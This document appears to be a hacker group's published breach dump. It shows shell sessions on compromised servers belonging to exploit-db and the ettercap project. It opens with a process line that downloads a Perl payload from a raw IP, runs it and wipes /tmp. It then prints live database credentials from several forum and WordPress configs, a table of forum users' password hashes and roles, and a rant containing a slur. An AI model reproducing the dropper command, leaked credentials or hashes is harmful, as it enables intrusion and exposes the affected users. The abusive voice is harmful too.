apache   32288  0.0  0.0   8704   820 ?        S    Nov23   0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod  x b;perl b;cd /tmp;rm -rf *;
apache   32289  0.0  0.0  58608  1508 ?        S    Nov23   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/b";

$ w
 12:28:48 up 30 days, 40 min,  1 user,  load average: 0.65, 0.64, 0.66
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    sec-sog-2.v99.ch 04:17    8:03m  0.11s  0.11s -bash

$ ls -lah /home/groups/e/et/ettercap/htdocs/
total 2.7M
drwxrwsr-x  8 dummy 18435 2.0K Oct 18  2009 .
drwxrws--x  5 dummy 18435 1.0K Sep 17  2008 ..
-rw-r--r--  1 42100 18435 2.2K Dec 21  2004 authors.php
drwxr-xr-x  2 42100 18435 2.0K Aug  9  2008 devel
-rw-r--r--  1 42100 18435 1.6K Apr 15  2004 download.php
-rw-r--r--  1 42100 18435 2.7K Apr 24  2004 fingerprint.php
drwx--x--x 10 42100 18435 2.0K Oct 18  2009 forum
-rw-r--r--  1 42100 18435 2.2K Apr 15  2004 history.php
drwxr-xr-x  3 42100 18435 1.0K Aug  9  2008 images
drwxr-xr-x  2 42100 18435 1.0K Aug  9  2008 includes
-rw-r--r--  1 42100 18435 4.6K Sep 23  2004 index.php
-rw-r--r--  1 42100 18435  768 Apr 15  2004 latest.php
-rw-r--rw-  1 42100 18435    5 Aug 15  2005 latest.stat
-rw-r--r--  1 42100 18435  886 Apr 15  2004 news.php
-rw-r--r--  1 42100 18435 5.3K Nov 13  2003 news.txt
-rw-r--r--  1 42100 18435 2.3M Oct 18  2009 phpBB-3.0.5.zip
drwxr-xr-x 13 42100 18435 2.0K Oct 18  2009 phpBB3
-rw-r--r--  1 42100 18435  743 Apr 15  2004 plugins.php
-rw-r--r--  1 42100 18435  914 May  6  2003 plugins.txt
drwxr-xr-x  2 42100 18435 2.0K Aug  9  2008 release
-rw-r--r--  1 42100 18435 3.7K Apr 15  2004 screenshots.php
-rw-r--r--  1 42100 18435 1019 Apr 15  2004 search.php
-rw-r--r--  1 42100 18435 1.8K Apr 15  2004 stuff.php
-rw-r--r--  1 42100 18435 1.5K Jan 25  2001 style.css
-rw-r--rw-  1 42100 18435 3.0K Aug 15  2005 submitted.fingers.txt
-rw-r--r--  1 42100 18435  12K Jun 24  2005 updateNG.data
-rw-rw-rw-  1 42100 18435 230K Aug 15  2005 updateNG.log
-rw-r--r--  1 42100 18435 2.0K Nov  9  2005 updateNG.php
-rwxr-xr-x  1 42100 18435  201 Jul 13  2003 updateNG.sh

$ cat /home/groups/e/et/ettercap/htdocs/updateNG.sh
#!/bin/sh

wget http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/ettercap/ettercap_ng/share/ -O updateNG.data
chmod 644 updateNG.data
scp updateNG.data [email protected]:ettercap
rm -f updateNG.data

$ cat /home/groups/e/et/ettercap/htdocs/forum/config.php
<?php

//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//

$dbms = "mysql";

$dbhost = "mysql4-e";
$dbname = "e17435_etterforum";
$dbuser = "e17435admin";
$dbpasswd = "ettersql_a";

$table_prefix = "phpbb_";

define('PHPBB_INSTALLED', true);

define('DEBUG', true);

?>

$ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email,
phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank
id WHERE user_rank > 0 ORDER BY user_rank
NaGA:256ce2d528caee146c82f20a3378673f:[email protected]:Ettercap Developer
ares:9c05a83765c4aad064d737496dae2dee:[email protected]:Supporter
metaldemon:3ef4f11188954e64884037cae7c3e963:[email protected]:Supporter
ttyp1:3c5e778f14dee668c0a9560fb8a6ced2:[email protected]:Betatester
drygol:c8214d5d4d4eb4b45d2bca063c07dd6a:[email protected]:Betatester
Gumble:ce7bcda695c30aa2f9e5f390c820d985:[email protected]:Betatester
Acelent:817b61c60959294d4250912f816f9451:[email protected]:Betatester
Jammer:a13f5ed8c46f26076c20fd4829901bc8:[email protected]:Betatester
m|n|moE:de9cb5d4ae42da6b8eb6623c322fa200:[email protected]:Betatester
Crusher4:2df66ae5eb0807dd2b84933adf3c4981:[email protected]:Betatester
MathieuMa:f8c22494a40f2c034aa73b891135da85:[email protected]:Betatester
Mapes:3e1bbf17e6528381ae1e1e596733fb9a:[email protected]:Betatester
garaged:3c2234a7ce973bc1700e0c743d6a819c:[email protected]:Betatester
Piw:a980baafb7bdb3d71aec6fc3776323ac:[email protected]:Betatester
mod7:e40fbc4015c12f4c97e5e65b38127a96:[email protected]:Betatester
stromax:274216f1c8423d3bad9cc3f684e31ffa:[email protected]:Betatester
DigitalDust:e80eded141e1295d694cd35cf2b8f675:[email protected]:Betatester
cableguy:37430a92973d1adca9934f0a5ecc53d2:[email protected]:Betatester
Suntac:9e220ad44ce3cae2c5dd5a6a6e770837:[email protected]:Betatester
SGResu:0d736aad1ff5a82ca580e7980f2de88d:[email protected]:joker
LnZ:292b804c2895989cebef7340971d1e8d:[email protected]:fac totum
megabug:74b468fafab62ade90622085691026dd:[email protected]:
Zero_Chaos:7b24afc8bc80e548d66c4e7ff72171c5:[email protected]:Contributor
daten:eff1541059e9a263b245657e1805b339:[email protected]:Contributor


 ____________________________________________________|_._._._._._._._,
 \___________________________________________________|_|_|_|_|_|_|_|_|
                                                     ! ~ exploit-db ~ 
                                                                      
Now we come to a different topic. A topic about people who  leech  off
what the scene creates  and  call  it  their  own.  About  people  who
copyright ideas and papers about security  related  topics  that  have
been around for years. How many  XSS-Papers  are  there  currently  on
exploit-db? How many retarded strcpy(buf,  argv[1])-papers  are  being
written over and over  again?  About  whitehats  who  think  releasing
exploits would make the world much more safe.  And  because  of  fame.
They all want fame so badly that they do anything  and  everything  in
order to be part of the security industry. What's even more  hilarious
is that these "famous" security people keep  getting  owned.  We  mean
el8, phc, h0no, and zf0  have  all  owned  these  "Security  Rockstar"
faggots and yet, nothing changes. Or the attacks  are  categorized  as
"skiddy" behavior. It's rediculous how terrible the industry is. There
is no accountability anymore.                                         
                                                                      
Still there are some lame skids that need a good spanking.  Stupid  10
year olds who take perl-exploits to destroy  clan-pages  for  fun  and
call  themselves  "hackers"  without  knowing  what  they  are  doing.
Criminals who take exploits to  steal  payment  stuff  for  their  own
selfish financial gain. And  to  get  their  friends  thrown  in  jail
(soup). Fame and money... Get the message?                            

$ uname -a
Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ pwd
/var/www

$ ls -la
total 24180
drwxr-xr-x 18 www-data www-data     4096 Nov 26 10:16 .
drwxr-xr-x 19 root     root         4096 Sep 24 09:26 ..
-rw-r--r--  1 www-data www-data     1005 Nov 12 19:03 .htaccess
-rw-r--r--  1 www-data www-data      764 Nov  5 17:32 .htaccess.save
-rw-r--r--  1 www-data www-data  2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png
drwxr-xr-x  4 www-data www-data     4096 Nov 11 07:43 92384723987239847239847234982734
-rw-r--r--  1 www-data www-data    46149 Nov 11 17:04 apc123456.php
-rw-r--r--  1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2
-rw-r--r--  1 www-data www-data    18851 Jul  9 14:42 disclosure.html
-rw-r--r--  1 www-data www-data    11662 Nov 11 11:42 dorkorinos.txt
drwxr-xr-x  2 www-data www-data     4096 Jul  9 14:42 edbpartners
-rw-r--r--  1 www-data www-data     1406 Jul  9 14:53 favicon.ico
-rw-r--r--  1 www-data www-data     1921 Jul  9 14:42 feature.txt
-rw-r--r--  1 www-data www-data     1923 Jul 11 16:01 feature1.txt
drwxr-xr-x 21 www-data www-data     4096 Nov 22 20:06 forums
drwxr-xr-x  2 www-data www-data     4096 Sep 23 06:41 funny404
-rw-r--r--  1 www-data www-data     1119 Nov 22 07:45 gd_rss.php
-rw-r--r--  1 www-data www-data       65 Aug 26 04:53 goaway.php
-rw-r--r--  1 www-data www-data       53 Jul  9 14:42 googled6c4817aa45e0032.html
-rw-r--r--  1 www-data www-data        5 Nov 11 07:24 hola.txt
-rw-r--r--  1 www-data www-data  3154634 Nov 11 07:25 hola.xml
drwxr-xr-x 15 www-data www-data     4096 Nov 22 15:50 images
-rw-r--r--  1 www-data www-data      397 Aug 26 04:53 index.php
drwxr-xr-x  2 www-data www-data     4096 Nov  4 12:20 leetdownloads
-rw-r--r--  1 www-data www-data      311 Nov 12 18:40 maintenance.php
drwxr-xr-x  2 root     root         4096 Nov 26 10:18 movies
-rw-r--r--  1 www-data www-data      106 Aug 26 04:53 news.php
drwxr-xr-x  2 www-data www-data     4096 Nov 11 17:20 nginx-default
-rw-r--r--  1 www-data www-data      220 Oct 30 17:00 pagerank.html
-rw-r--r--  1 www-data www-data      761 Sep  6 06:12 rating.txt
-rw-r--r--  1 www-data www-data     9122 Aug 18 05:32 readme.html
-rw-r--r--  1 www-data www-data       47 Jul  9 14:53 robots_ssl.txt
-rw-r--r--  1 www-data www-data  4007150 Dec  1 07:47 ror.xml
-rw-r--r--  1 www-data www-data     2102 Sep  1 05:40 rss.php
drwxr-xr-x  2 www-data www-data     4096 Jul  9 14:42 scripts
-rw-r--r--  1 www-data www-data     1056 Sep  3 18:05 search-mobile.php
-rw-r--r--  1 www-data www-data      108 Aug 26 04:53 search.php
-rw-r--r--  1 www-data www-data  3337393 Dec  1 07:47 sitemap.xml
-rw-r--r--  1 www-data www-data     3462 Aug 19 11:37 sitemap.xsl
-rw-r--r--  1 www-data www-data    30533 Nov 30 17:52 sitemap_blog.xml
-rw-r--r--  1 www-data www-data     4229 Nov 30 17:52 sitemap_blog.xml.gz
drwxr-xr-x  3 www-data www-data     4096 Jul  9 14:42 slider
drwxr-xr-x  2 www-data www-data    20480 Dec  4 09:18 sploits
-rw-r--r--  1 www-data www-data     9621 Nov  3 19:52 style.css
drwxr-xr-x  2 www-data www-data     4096 Sep 23 06:40 testme
-rw-r--r--  1 www-data www-data     5699 Nov  4 07:22 tpl_search.php
-rw-r--r--  1 www-data www-data       16 Nov 28 06:52 update-982374.txt
-rw-r--r--  1 www-data www-data       50 Aug 26 04:53 updated.php
drwxr-xr-x  3 www-data www-data     4096 Aug  3 09:35 videos
-rw-r--r--  1 www-data www-data     4391 Aug 26 04:53 wp-activate.php
drwxr-xr-x  8 www-data www-data     4096 Nov 11 17:59 wp-admin
-rw-r--r--  1 www-data www-data    40284 Aug 26 04:53 wp-app.php
-rw-r--r--  1 www-data www-data      220 Aug 26 04:53 wp-atom.php
-rw-r--r--  1 www-data www-data      274 Aug 26 04:53 wp-blog-header.php
-rw-r--r--  1 www-data www-data     3926 Aug 26 04:53 wp-comments-post.php
-rw-r--r--  1 www-data www-data      238 Aug 26 04:53 wp-commentsrss2.php
-rw-r--r--  1 www-data www-data     3173 Aug 26 04:53 wp-config-sample.php
-rw-r--r--  1 www-data www-data     2832 Nov 11 17:59 wp-config.php
drwxr-xr-x  8 www-data www-data     4096 Dec  3 22:49 wp-content
-rw-r--r--  1 www-data www-data     1255 Aug 26 04:53 wp-cron.php
-rw-r--r--  1 www-data www-data      240 Aug 26 04:53 wp-feed.php
drwxr-xr-x  7 www-data www-data     4096 Sep  8 13:52 wp-includes
-rw-r--r--  1 www-data www-data     2002 Aug 26 04:53 wp-links-opml.php
-rw-r--r--  1 www-data www-data     2441 Aug 26 04:53 wp-load.php
-rw-r--r--  1 www-data www-data    26160 Sep  3 21:48 wp-login.php
-rw-r--r--  1 www-data www-data     7774 Aug 26 04:53 wp-mail.php
-rw-r--r--  1 www-data www-data      487 Aug 26 04:53 wp-pass.php
-rw-r--r--  1 www-data www-data      218 Aug 26 04:53 wp-rdf.php
-rw-r--r--  1 www-data www-data      316 Aug 26 04:53 wp-register.php
-rw-r--r--  1 www-data www-data      218 Aug 26 04:53 wp-rss.php
-rw-r--r--  1 www-data www-data      220 Aug 26 04:53 wp-rss2.php
-rw-r--r--  1 www-data www-data     9177 Sep  8 13:01 wp-settings.php
-rw-r--r--  1 www-data www-data    18695 Aug 26 04:53 wp-signup.php
-rw-r--r--  1 www-data www-data     3702 Aug 26 04:53 wp-trackback.php
-rw-r--r--  1 www-data www-data    93955 Aug 26 04:53 xmlrpc-orig.php
-rw-r--r--  1 www-data www-data    94184 Aug 26 04:53 xmlrpc.php


$ cat wp-config.php
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
//define('DB_NAME', 'explot2');
define('WP_CACHE', true); //Added by WP-Cache Manager
define('DB_NAME', 'edb_new');

/** MySQL database username */
define('DB_USER', 'edbuser');

/** MySQL database password */
//define('DB_PASSWORD', 'admin123');
define('DB_PASSWORD', '2834729347928372342');
//define('DB_PASSWORD', 'f00b204e98009d22b68e54a');

/** MySQL hostname */
define('DB_HOST', 'localhost');
define('WP_MEMORY_LIMIT', '1024M');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
define('FORCE_SSL_LOGIN', true);

/**#@+
 * Authentication Unique Keys.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-k
 * You can change these at any point in time to invalidate all existing cookies. This will force all users 
 in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * WordPress Localized Language, defaults to English.
 *
 * Change this to localize WordPress.  A corresponding MO file for the chosen
 * language must be installed to wp-content/languages. For example, install
 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
 * language support.
 */
define ('WPLANG', '');

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_DEBUG',true);
define('WP_MEMORY_LIMIT', '128M');

$ cd forums

$ ls -la
total 2344
drwxr-xr-x 21 www-data www-data   4096 Nov 22 20:06 .
drwxr-xr-x 18 www-data www-data   4096 Nov 26 10:16 ..
-rw-r--r--  1 www-data www-data   1008 Nov  6 12:03 .htaccess
-rw-rw-r--  1 www-data www-data  17862 Nov 22 20:01 LICENSE
drwxr-xr-x  3 www-data www-data   4096 Nov 22 20:04 admincp
drwxr-xr-x  3 www-data www-data   4096 Nov 22 20:04 admincp-23987239874298273987234
-rwxr-xr-x  1 www-data www-data  40193 Nov 22 20:01 ajax.php
-rwxr-xr-x  1 www-data www-data  75603 Nov 22 20:01 album.php
-rwxr-xr-x  1 www-data www-data  19119 Nov 22 20:01 announcement.php
drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 archive
-rwxr-xr-x  1 www-data www-data   9040 Nov 22 20:01 asset.php
-rwxr-xr-x  1 www-data www-data  21161 Nov 22 20:01 assetmanage.php
-rwxr-xr-x  1 www-data www-data  15788 Nov 22 20:01 attachment.php
-rwxr-xr-x  1 www-data www-data   6935 Nov 22 20:01 attachment_inlinemod.php
-rwxr-xr-x  1 www-data www-data   3616 Nov 22 20:01 blog_attachment.php
-rwxr-xr-x  1 www-data www-data  96121 Nov 22 20:01 calendar.php
-rwxr-xr-x  1 www-data www-data     43 Nov 22 20:01 clear.gif
drwxr-xr-x  9 www-data www-data   4096 Nov  6 11:22 clientscript
-rwxr-xr-x  1 www-data www-data  15786 Nov 22 20:01 converse.php
drwxr-xr-x  7 www-data www-data   4096 Nov  6 11:22 cpstyles
-rwxr-xr-x  1 www-data www-data   3309 Nov 22 20:01 cron.php
-rwxr-xr-x  1 www-data www-data   6145 Nov 22 20:01 css.php
drwxr-xr-x  3 www-data www-data   4096 Nov  6 11:22 customavatars
drwxr-xr-x  3 www-data www-data   4096 Nov  6 11:22 customgroupicons
drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 customprofilepics
-rwxr-xr-x  1 www-data www-data   1823 Nov 22 20:01 editor.php
-rwxr-xr-x  1 www-data www-data  47010 Nov 22 20:01 editpost.php
-rwxr-xr-x  1 www-data www-data   1427 Nov 22 20:01 entry.php
-rwxr-xr-x  1 www-data www-data  30084 Nov 22 20:01 external.php
-rwxr-xr-x  1 www-data www-data   9966 Nov 22 20:01 faq.php
-rwxr-xr-x  1 www-data www-data  10134 Nov 22 20:01 favicon.ico
-rwxr-xr-x  1 www-data www-data  23332 Nov 22 20:01 forum.php
-rwxr-xr-x  1 www-data www-data  42452 Nov 22 20:01 forumdisplay.php
-rwxr-xr-x  1 www-data www-data   2066 Nov 22 20:01 global.php
-rwxr-xr-x  1 www-data www-data 155838 Nov 22 20:01 group.php
-rwxr-xr-x  1 www-data www-data  26150 Nov 22 20:01 group_inlinemod.php
-rwxr-xr-x  1 www-data www-data  11883 Nov 22 20:01 groupsubscription.php
-rwxr-xr-x  1 www-data www-data   9039 Nov 22 20:01 image.php
drwxr-xr-x 24 www-data www-data   4096 Nov  6 13:16 images
drwxr-xr-x  8 www-data www-data  12288 Nov  6 14:29 includes
-rwxr-xr-x  1 www-data www-data   2396 Nov 22 20:01 index.php
-rwxr-xr-x  1 www-data www-data  47021 Nov 22 20:01 infraction.php
-rwxr-xr-x  1 www-data www-data 187803 Nov 22 20:01 inlinemod.php
-rwxr-xr-x  1 www-data www-data  11440 Nov 22 20:01 joinrequests.php
-rwxr-xr-x  1 www-data www-data   1757 Nov 22 20:01 list.php
-rwxr-xr-x  1 www-data www-data  10947 Nov 22 20:01 login.php
-rwxr-xr-x  1 www-data www-data  30244 Nov 22 20:01 member.php
-rwxr-xr-x  1 www-data www-data  16392 Nov 22 20:01 member_inlinemod.php
-rwxr-xr-x  1 www-data www-data  40345 Nov 22 20:01 memberlist.php
-rwxr-xr-x  1 www-data www-data  22264 Nov 22 20:01 misc.php
drwxr-xr-x  2 www-data www-data   4096 Nov 22 20:01 modcp
drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:55 modcp-23987239874298273987234
-rwxr-xr-x  1 www-data www-data  76827 Nov 22 20:01 moderation.php
-rwxr-xr-x  1 www-data www-data   6779 Nov 22 20:01 moderator.php
-rwxr-xr-x  1 www-data www-data  17552 Nov 22 20:01 newattachment.php
-rwxr-xr-x  1 www-data www-data  41079 Nov 22 20:01 newreply.php
-rwxr-xr-x  1 www-data www-data  20185 Nov 22 20:01 newthread.php
-rwxr-xr-x  1 www-data www-data  21802 Nov 22 20:01 online.php
drwxr-xr-x  5 www-data www-data   4096 Nov  6 11:22 packages
-rwxr-xr-x  1 www-data www-data   8096 Nov 22 20:01 payment_gateway.php
-rwxr-xr-x  1 www-data www-data  13360 Nov 22 20:01 payments.php
-rwxr-xr-x  1 www-data www-data   4156 Nov 22 20:01 picture.php
-rwxr-xr-x  1 www-data www-data  16665 Nov 22 20:01 picture_inlinemod.php
-rwxr-xr-x  1 www-data www-data  26169 Nov 22 20:01 picturecomment.php
-rwxr-xr-x  1 www-data www-data  29338 Nov 22 20:01 poll.php
-rwxr-xr-x  1 www-data www-data  10414 Nov 22 20:01 posthistory.php
-rwxr-xr-x  1 www-data www-data  76585 Nov 22 20:01 postings.php
-rwxr-xr-x  1 www-data www-data   7087 Nov 22 20:01 printthread.php
-rwxr-xr-x  1 www-data www-data  79435 Nov 22 20:01 private.php
-rwxr-xr-x  1 www-data www-data 163695 Nov 22 20:01 profile.php
-rwxr-xr-x  1 www-data www-data  56363 Nov 22 20:01 register.php
-rwxr-xr-x  1 www-data www-data   7294 Nov 22 20:01 report.php
-rwxr-xr-x  1 www-data www-data  14765 Nov 22 20:01 reputation.php
-rwxr-xr-x  1 www-data www-data  35793 Nov 22 20:01 search.php
-rwxr-xr-x  1 www-data www-data  22710 Nov 22 20:01 sendmessage.php
-rwxr-xr-x  1 www-data www-data  12485 Nov 22 20:01 showgroups.php
-rwxr-xr-x  1 www-data www-data  12738 Nov 22 20:01 showpost.php
-rwxr-xr-x  1 www-data www-data  80115 Nov 22 20:01 showthread.php
drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 signaturepics
drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 store_sitemap
-rwxr-xr-x  1 www-data www-data  38862 Nov 22 20:01 subscription.php
-rwxr-xr-x  1 www-data www-data   5399 Nov 22 20:01 tags.php
-rwxr-xr-x  1 www-data www-data   8800 Nov 22 20:01 threadrate.php
-rwxr-xr-x  1 www-data www-data  11146 Nov 22 20:01 threadtag.php
-rwxr-xr-x  1 www-data www-data     61 Nov 22 20:01 uploadprogress.gif
-rwxr-xr-x  1 www-data www-data  39717 Nov 22 20:01 usercp.php
-rwxr-xr-x  1 www-data www-data  21034 Nov 22 20:01 usernote.php
drwxr-xr-x 13 www-data www-data   4096 Nov  6 11:22 vb
drwxr-xr-x  8 www-data www-data   4096 Nov  6 12:23 vboptimise
-rw-r--r--  1 www-data www-data   2324 Nov  6 12:23 vboptimise.php
drwxr-xr-x  4 www-data www-data   4096 Nov  6 11:55 vbseo
-rw-r--r--  1 www-data www-data  45286 Nov  6 11:55 vbseo.php
drwxr-xr-x  4 www-data www-data   4096 Nov  6 14:29 vbseo_sitemap
-rw-r--r--  1 www-data www-data   4335 Nov  6 11:55 vbseocp.php
-rwxr-xr-x  1 www-data www-data  27879 Nov 22 20:01 visitormessage.php
-rwxr-xr-x  1 www-data www-data   1761 Nov 22 20:01 widget.php
-rwxr-xr-x  1 www-data www-data   3952 Nov 22 20:01 xmlsitemap.php

$ cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.8
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is �2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to    |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables    |
| in this file.                                           |
\*-------------------------------------------------------*/

        //      ****** DATABASE TYPE ******
        //      This is the type of the database server on which your vBulletin database will be located.
        //      Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP
 5 and MySQL 4.1+
        // for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';

        //      ****** DATABASE NAME ******
        //      This is the name of the database where your vBulletin will be located.
        //      This must be created by your webhost.
$config['Database']['dbname'] = 'edbforum';

        //      ****** TABLE PREFIX ******
        //      Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

        //      ****** TECHNICAL EMAIL ADDRESS ******
        //      If any database errors occur, they will be emailed to the address specified here.
        //      Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = '[email protected]';

        //      ****** FORCE EMPTY SQL MODE ******
        // New versions of MySQL (4.1+) have introduced some behaviors that are
        // incompatible with vBulletin. Setting this value to "true" disables those
        // behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;



        //      ****** MASTER DATABASE SERVER NAME AND PORT ******
        //      This is the hostname or IP address and port of the database server.
        //      If you are unsure of what to put here, leave the default values.
        //
        //      Note: If you are using IIS 7+ and MySQL is on the same machine, you
        //      need to use 127.0.0.1 instead of localhost
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

        //      ****** MASTER DATABASE USERNAME & PASSWORD ******
        //      This is the username and password you use to access MySQL.
        //      These must be obtained through your webhost.
$config['MasterServer']['username'] = 'forums';
$config['MasterServer']['password'] = '2834725234523472342';

        //      ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
        //      This option allows you to turn persistent connections to MySQL on or off.
        //      The difference in performance is negligible for all but the largest boards.
        //      If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;



        //      ****** SLAVE DATABASE CONFIGURATION ******
        //      If you have multiple database backends, this is the information for your slave
        //      server. If you are not 100% sure you need to fill in this information,
        //      do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



        //      ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
        //      This setting allows you to change the name of the folders that the admin and
        //      moderator control panels reside in. You may wish to do this for security purposes.
        //      Please note that if you change the name of the directory here, you will still need
        //      to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincp-23987239874298273987234';
$config['Misc']['modcpdir'] = 'modcp-23987239874298273987234';

        //      Prefix that all vBulletin cookies will have
        //      Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';

        //      ******** FULL PATH TO FORUMS DIRECTORY ******
        //      On a few systems it may be necessary to input the full path to your forums directory
        //      for vBulletin to function normally. You can ignore this setting unless vBulletin
        //      tells you to fill this in. Do not include a trailing slash!
        //      Example Unix:
        //        $config['Misc']['forumpath'] = '/home/users/public_html/forums';
        //      Example Win32:
        //        $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';



        //      ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
        //      The users specified here will be allowed to view the admin log in the control panel.
        //      Users must be specified by *ID number* here. To obtain a user's ID number,
        //      view their profile via the control panel. If this is a new installation, leave
        //      the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';

        //      ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
        //      The users specified here will be allowed to remove ("prune") entries from the admin
        //      log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';

        //      ****** USERS WITH QUERY RUNNING PERMISSIONS ******
        //      The users specified here will be allowed to run queries from the control panel.
        //      See the above entries for more information on the format.
        //      Please note that the ability to run queries is quite powerful. You may wish
        //      to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';

        //      ****** UNDELETABLE / UNALTERABLE USERS ******
        //      The users specified here will not be deletable or alterable from the control panel by any users.
        //      To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';

        //      ****** SUPER ADMINISTRATORS ******
        //      The users specified below will have permission to access the administrator permissions
        //      page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1';

        // ****** DATASTORE CACHE CONFIGURATION *****
        // Here you can configure different methods for caching datastore items.
        // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
        // vB_Datastore_APC - to use APC
        // vB_Datastore_XCache - to use XCache
        // vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';

        // ******** DATASTORE PREFIX ******
        // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
        // than one set of forums installed on your host, you *may* need to use a prefix
        // so that they do not try to use the same variable within the cache.
        // This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';

        // It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i]           = '127.0.0.1';
$config['Misc']['memcacheport'][$i]                     = 11211;
$config['Misc']['memcachepersistent'][$i]       = true;
$config['Misc']['memcacheweight'][$i]           = 1;
$config['Misc']['memcachetimeout'][$i]          = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/

// ****** The following options are only needed in special cases ******

        //      ****** MySQLI OPTIONS *****
        // When using MySQL 4.1+, MySQLi should be used to connect to the database.
        // If you need to set the default connection charset because your database
        // is using a charset other than latin1, you can set the charset here.
        // If you don't set the charset to be the same as your database, you
        // may receive collation errors.  Ignore this setting unless you
        // are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';

        //      Optionally, PHP can be instructed to set connection parameters by reading from the
        //      file named in 'ini_file'. Please use a full path to the file.
        //      Example:
        //      $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';

// Image Processing Options
        // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger image
s, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| # Downloaded: 10:22, Sat Nov 6th 2010
|| # CVS: $RCSfile$ - $Revision: 39199 $
|| ####################################################################
\*======================================================================*/

$ cd /

$ ls -la
total 112
drwxr-xr-x  26 root root  4096 Nov 30 06:53 .
drwxr-xr-x  26 root root  4096 Nov 30 06:53 ..
drw-------   2 root root  4096 Dec  4 03:45 backup
